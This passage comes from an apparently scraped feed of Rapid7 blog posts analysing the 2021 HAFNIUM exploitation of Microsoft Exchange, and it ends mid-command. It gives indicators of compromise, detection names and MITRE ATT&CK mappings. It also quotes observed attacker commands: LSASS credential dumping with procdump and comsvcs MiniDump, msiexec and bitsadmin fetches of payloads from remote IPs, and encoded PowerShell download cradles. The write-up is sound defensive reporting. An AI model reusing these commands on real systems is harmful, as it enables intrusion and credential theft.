chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack . Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc 